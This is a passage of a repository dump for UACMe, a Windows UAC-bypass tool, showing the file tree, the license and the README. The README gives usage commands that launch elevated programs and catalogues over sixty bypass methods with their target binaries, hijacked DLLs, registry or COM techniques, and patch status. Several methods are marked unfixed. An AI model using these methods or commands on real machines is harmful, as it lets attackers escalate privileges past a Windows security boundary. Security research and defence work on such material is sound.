Repository: hfiref0x/UACME
Branch: master
Commit: 6daa8d486250
Files: 168
Total size: 1.6 MB
Directory structure:
gitextract_23hrulia/
├── .gitattributes
├── Bin/
│ └── .empty
├── LICENSE.md
├── README.md
├── Source/
│ ├── Akagi/
│ │ ├── Resource.rc
│ │ ├── aic.c
│ │ ├── aic.h
│ │ ├── akagi.manifest
│ │ ├── appinfo/
│ │ │ ├── appinfo.acf
│ │ │ ├── appinfo.idl
│ │ │ ├── x64/
│ │ │ │ ├── appinfo64.c
│ │ │ │ └── appinfo64.h
│ │ │ └── x86-32/
│ │ │ ├── appinfo32.c
│ │ │ └── appinfo32.h
│ │ ├── bin/
│ │ │ ├── Akatsuki64.cd
│ │ │ ├── Fubuki32.cd
│ │ │ ├── Fubuki64.cd
│ │ │ └── Kamikaze.cd
│ │ ├── bin32res.h
│ │ ├── bin32res.rc
│ │ ├── bin64res.h
│ │ ├── bin64res.rc
│ │ ├── compress.c
│ │ ├── compress.h
│ │ ├── console.c
│ │ ├── console.h
│ │ ├── encresource.h
│ │ ├── fusutil.c
│ │ ├── fusutil.h
│ │ ├── global.h
│ │ ├── main.c
│ │ ├── makecab.c
│ │ ├── makecab.h
│ │ ├── methods/
│ │ │ ├── antonioCoco.c
│ │ │ ├── api0cradle.c
│ │ │ ├── azagarampur.c
│ │ │ ├── comsup.c
│ │ │ ├── comsup.h
│ │ │ ├── dwells.c
│ │ │ ├── elvint.h
│ │ │ ├── hakril.c
│ │ │ ├── hybrids.c
│ │ │ ├── methods.c
│ │ │ ├── methods.h
│ │ │ ├── rinn.c
│ │ │ ├── routines.h
│ │ │ ├── shellsup.c
│ │ │ ├── tyranid.c
│ │ │ ├── wusa.c
│ │ │ └── zcgonvh.c
│ │ ├── pcasvc/
│ │ │ ├── w7/
│ │ │ │ ├── pcasvc7.acf
│ │ │ │ ├── pcasvc7.idl
│ │ │ │ ├── x64/
│ │ │ │ │ ├── pcasvc7_64.c
│ │ │ │ │ └── pcasvc7_64.h
│ │ │ │ └── x86-32/
│ │ │ │ ├── pcasvc7_32.c
│ │ │ │ └── pcasvc7_32.h
│ │ │ └── w8_10/
│ │ │ ├── pcasvc.acf
│ │ │ ├── pcasvc.idl
│ │ │ ├── x64/
│ │ │ │ ├── pcasvc64.c
│ │ │ │ └── pcasvc64.h
│ │ │ └── x86-32/
│ │ │ ├── pcasvc32.c
│ │ │ └── pcasvc32.h
│ │ ├── resource.h
│ │ ├── stub.c
│ │ ├── stub.h
│ │ ├── sup.c
│ │ ├── sup.h
│ │ ├── tests/
│ │ │ ├── test.c
│ │ │ └── test.h
│ │ ├── uacme.vcxproj
│ │ ├── uacme.vcxproj.filters
│ │ ├── uacme.vcxproj.user
│ │ └── uas.h
│ ├── Akatsuki/
│ │ ├── Akatsuki.vcxproj
│ │ ├── Akatsuki.vcxproj.filters
│ │ ├── Akatsuki.vcxproj.user
│ │ ├── dllmain.c
│ │ ├── export.def
│ │ ├── resource.h
│ │ └── version.rc
│ ├── Fubuki/
│ │ ├── atldll.h
│ │ ├── dll.vcxproj
│ │ ├── dll.vcxproj.filters
│ │ ├── dll.vcxproj.user
│ │ ├── dllmain.c
│ │ ├── export.def
│ │ ├── fubuki.h
│ │ ├── pca.c
│ │ ├── pca.h
│ │ ├── resource.h
│ │ ├── uihacks.c
│ │ ├── uihacks.h
│ │ ├── version.rc
│ │ └── winmm.h
│ ├── Kamikaze/
│ │ ├── Kamikaze.msc
│ │ └── Launcher.html
│ ├── Naka/
│ │ ├── Naka.vcxproj
│ │ ├── Naka.vcxproj.filters
│ │ ├── Naka.vcxproj.user
│ │ ├── main.c
│ │ └── naka.h
│ ├── README.md
│ ├── Shared/
│ │ ├── _filename.c
│ │ ├── _filename.h
│ │ ├── _strcat.c
│ │ ├── _strcmp.c
│ │ ├── _strcmpi.c
│ │ ├── _strcpy.c
│ │ ├── _strend.c
│ │ ├── _strlen.c
│ │ ├── _strncmp.c
│ │ ├── _strncmpi.c
│ │ ├── _strncpy.c
│ │ ├── _strstri.c
│ │ ├── cmdline.c
│ │ ├── cmdline.h
│ │ ├── consts.h
│ │ ├── hde/
│ │ │ ├── hde64.c
│ │ │ ├── hde64.h
│ │ │ ├── pstdint.h
│ │ │ └── table64.h
│ │ ├── itostr.c
│ │ ├── ldr.c
│ │ ├── ldr.h
│ │ ├── libinc.h
│ │ ├── minirtl.h
│ │ ├── ntos/
│ │ │ ├── ntbuilds.h
│ │ │ ├── ntos.h
│ │ │ └── ntsxs.h
│ │ ├── rtltypes.h
│ │ ├── shared.h
│ │ ├── strtoi.c
│ │ ├── strtoul.c
│ │ ├── u64tohex.c
│ │ ├── u64tostr.c
│ │ ├── ultohex.c
│ │ ├── ultostr.c
│ │ ├── util.c
│ │ ├── util.h
│ │ ├── windefend.c
│ │ └── windefend.h
│ ├── Yuubari/
│ │ ├── Resource.rc
│ │ ├── Yuubari.vcxproj
│ │ ├── Yuubari.vcxproj.filters
│ │ ├── Yuubari.vcxproj.user
│ │ ├── appinfo.c
│ │ ├── appinfo.h
│ │ ├── basic.c
│ │ ├── basic.h
│ │ ├── comobj.c
│ │ ├── comobj.h
│ │ ├── consts.h
│ │ ├── cui.c
│ │ ├── cui.h
│ │ ├── fusion.c
│ │ ├── fusion.h
│ │ ├── global.h
│ │ ├── logger.c
│ │ ├── logger.h
│ │ ├── main.c
│ │ ├── resource.h
│ │ ├── sup.c
│ │ ├── sup.h
│ │ ├── tests/
│ │ │ ├── test_fusion.c
│ │ │ └── test_fusion.h
│ │ └── wintrustex.h
│ └── uacme.sln
└── appveyor.yml
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
# Auto detect text files and perform LF normalization
* text=auto
================================================
FILE: LICENSE.md
================================================
Copyright (c) 2014 - 2025, UACMe Project
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: README.md
================================================
[](https://ci.appveyor.com/project/hfiref0x/uacme)
# UACMe
Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor. This project demonstrates various UAC bypass techniques and serves as an educational resource for understanding Windows security mechanisms.
> ⚠️ **Warning**: This tool demonstrates security vulnerabilities that could be exploited maliciously. Use responsibly and only in controlled environments.
# System Requirements
* **Operating Systems**: Windows 7/8/8.1/10/11 (x86-32/x64, client, some methods however works on server version too)
* **User Account**: Administrator account with UAC set on default settings
## Usage
Run the executable from command line using the following syntax:
```
akagi32.exe [Method_Number] [Optional_Command]
```
or
```
akagi64.exe [Method_Number] [Optional_Command]
```
### Parameters:
* **Method_Number**: Number corresponding to the UAC bypass method (see Methods List below)
* **Optional_Command**: Full path to an executable file to run with elevated privileges
* If omitted, the program will launch an elevated command prompt (%systemroot%\system32\cmd.exe)
### Examples:
```
akagi32.exe 23
akagi64.exe 61
akagi32.exe 23 c:\windows\system32\calc.exe
akagi64.exe 61 c:\windows\system32\charmap.exe
```
> **Note**: Since version 3.5.0, all previously "fixed" methods are considered obsolete and have been removed. If you need them, use [v3.2.x branch](https://github.com/hfiref0x/UACME/tree/v3.2.x).
Keys (click to expand/collapse)
1. Author: Leo Davidson
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): cryptbase.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: sysprep.exe hardened LoadFrom manifest elements
* Code status: removed starting from v3.5.0 :tractor:
2. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): ShCore.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 8.1 (9600)
* Fixed in: Windows 10 TP (> 9600)
* How: Side effect of ShCore.dll moving to \KnownDlls
* Code status: removed starting from v3.5.0 :tractor:
3. Author: Leo Davidson derivative by WinNT/Pitou
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\oobe\setupsqm.exe
* Component(s): WdsCore.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH2 (10558)
* How: Side effect of OOBE redesign
* Code status: removed starting from v3.5.0 :tractor:
4. Author: Jon Ericson, WinNT/Gootkit, mzH
* Type: AppCompat
* Method: RedirectEXE Shim
* Target(s): \system32\cliconfg.exe
* Component(s): -
* Implementation: ucmShimRedirectEXE
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TP (> 9600)
* How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions
* Code status: removed starting from v3.5.0 :tractor:
5. Author: WinNT/Simda
* Type: Elevated COM interface
* Method: ISecurityEditor
* Target(s): HKLM registry keys
* Component(s): -
* Implementation: ucmSimdaTurnOffUac
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: ISecurityEditor interface method changed
* Code status: removed starting from v3.5.0 :tractor:
6. Author: Win32/Carberp
* Type: Dll Hijack
* Method: WUSA
* Target(s): \ehome\mcx2prov.exe, \system32\migwiz\migwiz.exe
* Component(s): WdsCore.dll, CryptBase.dll, CryptSP.dll
* Implementation: ucmWusaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: WUSA /extract option removed
* Code status: removed starting from v3.5.0 :tractor:
7. Author: Win32/Carberp derivative
* Type: Dll Hijack
* Method: WUSA
* Target(s): \system32\cliconfg.exe
* Component(s): ntwdblib.dll
* Implementation: ucmWusaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: WUSA /extract option removed
* Code status: removed starting from v3.5.0 :tractor:
8. Author: Leo Davidson derivative by Win32/Tilon
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): Actionqueue.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: sysprep.exe hardened LoadFrom manifest
* Code status: removed starting from v3.5.0 :tractor:
9. Author: Leo Davidson, WinNT/Simda, Win32/Carberp derivative
* Type: Dll Hijack
* Method: IFileOperation, ISecurityEditor, WUSA
* Target(s): IFEO registry keys, \system32\cliconfg.exe
* Component(s): Attacker defined Application Verifier Dll
* Implementation: ucmAvrfMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH1 (10147)
* How: WUSA /extract option removed, ISecurityEditor interface method changed
* Code status: removed starting from v3.5.0 :tractor:
10. Author: WinNT/Pitou, Win32/Carberp derivative
* Type: Dll Hijack
* Method: IFileOperation, WUSA
* Target(s): \system32\\{New}or{Existing}\\{autoelevated}.exe, e.g. winsat.exe
* Component(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dll
* Implementation: ucmWinSATMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH2 (10548)
* How: AppInfo elevated application path control hardening
* Code status: removed starting from v3.5.0 :tractor:
11. Author: Jon Ericson, WinNT/Gootkit, mzH
* Type: AppCompat
* Method: Shim Memory Patch
* Target(s): \system32\iscsicli.exe
* Component(s): Attacker prepared shellcode
* Implementation: ucmShimPatch
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions
* Code status: removed starting from v3.5.0 :tractor:
12. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): dbgcore.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 10 TH1 (10240)
* Fixed in: Windows 10 TH2 (10565)
* How: sysprep.exe manifest updated
* Code status: removed starting from v3.5.0 :tractor:
13. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\mmc.exe EventVwr.msc
* Component(s): elsext.dll
* Implementation: ucmMMCMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14316)
* How: Missing dependency removed
* Code status: removed starting from v3.5.0 :tractor:
14. Author: Leo Davidson, WinNT/Sirefef derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system\credwiz.exe, \system32\wbem\oobe.exe
* Component(s): netutils.dll
* Implementation: ucmSirefefMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 TH2 (10548)
* How: AppInfo elevated application path control hardening
* Code status: removed starting from v3.5.0 :tractor:
15. Author: Leo Davidson, Win32/Addrop, Metasploit derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\cliconfg.exe
* Component(s): ntwdblib.dll
* Implementation: ucmGenericAutoelevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14316)
* How: Cliconfg.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
16. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\GWX\GWXUXWorker.exe, \system32\inetsrv\inetmgr.exe
* Component(s): SLC.dll
* Implementation: ucmGWX
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14316)
* How: AppInfo elevated application path control and inetmgr executable hardening
* Code status: removed starting from v3.5.0 :tractor:
17. Author: Leo Davidson derivative
* Type: Dll Hijack (Import forwarding)
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): unbcl.dll
* Implementation: ucmStandardAutoElevation2
* Works from: Windows 8.1 (9600)
* Fixed in: Windows 10 RS1 (14371)
* How: sysprep.exe manifest updated
* Code status: removed starting from v3.5.0 :tractor:
18. Author: Leo Davidson derivative
* Type: Dll Hijack (Manifest)
* Method: IFileOperation
* Target(s): \system32\taskhost.exe, \system32\tzsync.exe (any ms exe without manifest)
* Component(s): Attacker defined
* Implementation: ucmAutoElevateManifest
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14371)
* How: Manifest parsing logic reviewed
* Code status: removed starting from v3.5.0 :tractor:
19. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\inetsrv\inetmgr.exe
* Component(s): MsCoree.dll
* Implementation: ucmInetMgrMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14376)
* How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images
* Code status: removed starting from v3.5.0 :tractor:
20. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\mmc.exe, Rsop.msc
* Component(s): WbemComn.dll
* Implementation: ucmMMCMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16232)
* How: Target requires wbemcomn.dll to be signed by MS
* Code status: removed starting from v3.5.0 :tractor:
21. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation, SxS DotLocal
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): comctl32.dll
* Implementation: ucmSXSMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16232)
* How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images
* Code status: removed starting from v3.5.0 :tractor:
22. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation, SxS DotLocal
* Target(s): \system32\consent.exe
* Component(s): comctl32.dll
* Implementation: ucmSXSMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.5.0
23. Author: Leo Davidson derivative
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\pkgmgr.exe
* Component(s): DismCore.dll
* Implementation: ucmDismMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.5.1
24. Author: BreakingMalware
* Type: Shell API
* Method: Environment variables expansion
* Target(s): \system32\CompMgmtLauncher.exe
* Component(s): Attacker defined
* Implementation: ucmCometMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS2 (15031)
* How: CompMgmtLauncher.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
25. Author: Enigma0x3
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exe
* Component(s): Attacker defined
* Implementation: ucmHijackShellCommandMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS2 (15031)
* How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
26. Author: Enigma0x3
* Type: Race Condition
* Method: File overwrite
* Target(s): %temp%\GUID\dismhost.exe
* Component(s): LogProvider.dll
* Implementation: ucmDiskCleanupRaceCondition
* Works from: Windows 10 TH1 (10240)
* AlwaysNotify compatible
* Fixed in: Windows 10 RS2 (15031)
* How: File security permissions altered
* Code status: removed starting from v3.5.0 :tractor:
27. Author: ExpLife
* Type: Elevated COM interface
* Method: IARPUninstallStringLauncher
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmUninstallLauncherMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16199)
* How: UninstallStringLauncher interface removed from COMAutoApprovalList
* Code status: removed starting from v3.5.0 :tractor:
28. Author: Exploit/Sandworm
* Type: Whitelisted component
* Method: InfDefaultInstall
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmSandwormMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)
* Code status: removed starting from v3.5.0 :tractor:
29. Author: Enigma0x3
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\sdclt.exe
* Component(s): Attacker defined
* Implementation: ucmAppPathMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: Windows 10 RS3 (16215)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
30. Author: Leo Davidson derivative, lhc645
* Type: Dll Hijack
* Method: WOW64 logger
* Target(s): \syswow64\\{any elevated exe, e.g wusa.exe}
* Component(s): wow64log.dll
* Implementation: ucmWow64LoggerMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.0
31. Author: Enigma0x3
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\sdclt.exe
* Component(s): Attacker defined
* Implementation: ucmSdcltIsolatedCommandMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: Windows 10 RS4 (17025)
* How: Shell API / Windows components update
* Code status: removed starting from v3.5.0 :tractor:
32. Author: xi-tauw
* Type: Dll Hijack
* Method: UIPI bypass with uiAccess application
* Target(s): \Program Files\Windows Media Player\osk.exe, \system32\EventVwr.exe, \system32\mmc.exe
* Component(s): duser.dll, osksupport.dll
* Implementation: ucmUiAccessMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.1
33. Author: winscripting.blog
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\fodhelper.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.2
34. Author: James Forshaw
* Type: Shell API
* Method: Environment variables expansion
* Target(s): \system32\svchost.exe via \system32\schtasks.exe
* Component(s): Attacker defined
* Implementation: ucmDiskCleanupEnvironmentVariable
* Works from: Windows 8.1 (9600)
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.2
35. Author: CIA & James Forshaw
* Type: Impersonation
* Method: Token Manipulations
* Target(s): Autoelevated applications
* Component(s): Attacker defined
* Implementation: ucmTokenModification
* Works from: Windows 7 (7600)
* AlwaysNotify compatible, see note
* Fixed in: Windows 10 RS5 (17686)
* How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check added
* Code status: removed starting from v3.5.0 :tractor:
36. Author: Thomas Vanhoutte aka SandboxEscaper
* Type: Race condition
* Method: NTFS reparse point & Dll Hijack
* Target(s): wusa.exe, pkgmgr.exe
* Component(s): Attacker defined
* Implementation: ucmJunctionMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.4
37. Author: Ernesto Fernandez, Thomas Vanhoutte
* Type: Dll Hijack
* Method: SxS DotLocal, NTFS reparse point
* Target(s): \system32\dccw.exe
* Component(s): GdiPlus.dll
* Implementation: ucmSXSDccwMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.5
38. Author: Clement Rouault
* Type: Whitelisted component
* Method: APPINFO command line spoofing
* Target(s): \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmHakrilMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.6
39. Author: Stefan Kanthak
* Type: Dll Hijack
* Method: .NET Code Profiler
* Target(s): \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmCorProfilerMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.7
40. Author: Ruben Boonen
* Type: COM Handler Hijack
* Method: Registry key manipulation
* Target(s): \system32\mmc.exe, \system32\recdisc.exe
* Component(s): Attacker defined
* Implementation: ucmCOMHandlersMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 19H1 (18362)
* How: Side effect of Windows changes
* Code status: removed starting from v3.5.0 :tractor:
41. Author: Oddvar Moe
* Type: Elevated COM interface
* Method: ICMLuaUtil
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmCMLuaUtilShellExecMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.7.9
42. Author: BreakingMalware and Enigma0x3
* Type: Elevated COM interface
* Method: IFwCplLua
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmFwCplLuaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS4 (17134)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
43. Author: Oddvar Moe derivative
* Type: Elevated COM interface
* Method: IColorDataProxy, ICMLuaUtil
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmDccwCOMMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v2.8.3
44. Author: bytecode77
* Type: Shell API
* Method: Environment variables expansion
* Target(s): Multiple auto-elevated processes
* Component(s): Various per target
* Implementation: ucmVolatileEnvMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS3 (16299)
* How: Current user system directory variables ignored during process creation
* Code status: removed starting from v3.5.0 :tractor:
45. Author: bytecode77
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\slui.exe
* Component(s): Attacker defined
* Implementation: ucmSluiHijackMethod
* Works from: Windows 8.1 (9600)
* Fixed in: Windows 10 20H1 (19041)
* How: Side effect of Windows changes
* Code status: removed starting from v3.5.0 :tractor:
46. Author: Anonymous
* Type: Race Condition
* Method: Registry key manipulation
* Target(s): \system32\BitlockerWizardElev.exe
* Component(s): Attacker defined
* Implementation: ucmBitlockerRCMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS4 (>16299)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
47. Author: clavoillotte & 3gstudent
* Type: COM Handler Hijack
* Method: Registry key manipulation
* Target(s): \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmCOMHandlersMethod2
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 19H1 (18362)
* How: Side effect of Windows changes
* Code status: removed starting from v3.5.0 :tractor:
48. Author: deroko
* Type: Elevated COM interface
* Method: ISPPLUAObject
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmSPPLUAObjectMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS5 (17763)
* How: ISPPLUAObject interface method changed
* Code status: removed starting from v3.5.0 :tractor:
49. Author: RinN
* Type: Elevated COM interface
* Method: ICreateNewLink
* Target(s): \system32\TpmInit.exe
* Component(s): WbemComn.dll
* Implementation: ucmCreateNewLinkMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS1 (14393)
* How: Side effect of consent.exe COMAutoApprovalList introduction
* Code status: removed starting from v3.5.0 :tractor:
50. Author: Anonymous
* Type: Elevated COM interface
* Method: IDateTimeStateWrite, ISPPLUAObject
* Target(s): w32time service
* Component(s): w32time.dll
* Implementation: ucmDateTimeStateWriterMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS5 (17763)
* How: Side effect of ISPPLUAObject interface change
* Code status: removed starting from v3.5.0 :tractor:
51. Author: bytecode77 derivative
* Type: Elevated COM interface
* Method: IAccessibilityCplAdmin
* Target(s): \system32\rstrui.exe
* Component(s): Attacker defined
* Implementation: ucmAcCplAdminMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS4 (17134)
* How: Shell API update
* Code status: removed starting from v3.5.0 :tractor:
52. Author: David Wells
* Type: Whitelisted component
* Method: AipNormalizePath parsing abuse
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmDirectoryMockMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.0.4
53. Author: Emeric Nasi
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\sdclt.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 (14393)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.1.3
54. Author: egre55
* Type: Dll Hijack
* Method: Dll path search abuse
* Target(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exe
* Component(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dll
* Implementation: ucmEgre55Method
* Works from: Windows 10 (14393)
* Fixed in: Windows 10 19H1 (18362)
* How: SysDm.cpl!_CreateSystemRestorePage has been updated for secured load library call
* Code status: removed starting from v3.5.0 :tractor:
55. Author: James Forshaw
* Type: GUI Hack
* Method: UIPI bypass with token modification
* Target(s): \system32\osk.exe, \system32\msconfig.exe
* Component(s): Attacker defined
* Implementation: ucmTokenModUIAccessMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS5 (17763), a part of patch, 2024 year
* How: When integrity level of an UIAccess token is lowered, the UIAccess property is removed
* Code status: added in v3.1.5
56. Author: Hashim Jawad
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\WSReset.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod2
* Works from: Windows 10 (17134)
* Fixed in: Windows 11 (22000)
* How: Windows components redesign
* Code status: removed starting from v3.5.7 :tractor:
57. Author: Leo Davidson derivative by Win32/Gapz
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\sysprep\sysprep.exe
* Component(s): unattend.dll
* Implementation: ucmStandardAutoElevation
* Works from: Windows 7 (7600)
* Fixed in: Windows 8.1 (9600)
* How: sysprep.exe hardened LoadFrom manifest elements
* Code status: removed starting from v3.5.0 :tractor:
58. Author: RinN
* Type: Elevated COM interface
* Method: IEditionUpgradeManager
* Target(s): \system32\clipup.exe
* Component(s): Attacker defined
* Implementation: ucmEditionUpgradeManagerMethod
* Works from: Windows 10 (14393)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.0
59. Author: James Forshaw
* Type: AppInfo ALPC
* Method: RAiLaunchAdminProcess and DebugObject
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmDebugObjectMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.3
60. Author: Enigma0x3 derivative by WinNT/Glupteba
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\CompMgmtLauncher.exe
* Component(s): Attacker defined
* Implementation: ucmGluptebaMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS2 (15063)
* How: CompMgmtLauncher.exe autoelevation removed
* Code status: removed starting from v3.5.0 :tractor:
61. Author: Enigma0x3/bytecode77 derivative by Nassim Asrir
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\slui.exe, \system32\changepk.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod
* Works from: Windows 10 (14393)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.5
62. Author: winscripting.blog
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\computerdefaults.exe
* Component(s): Attacker defined
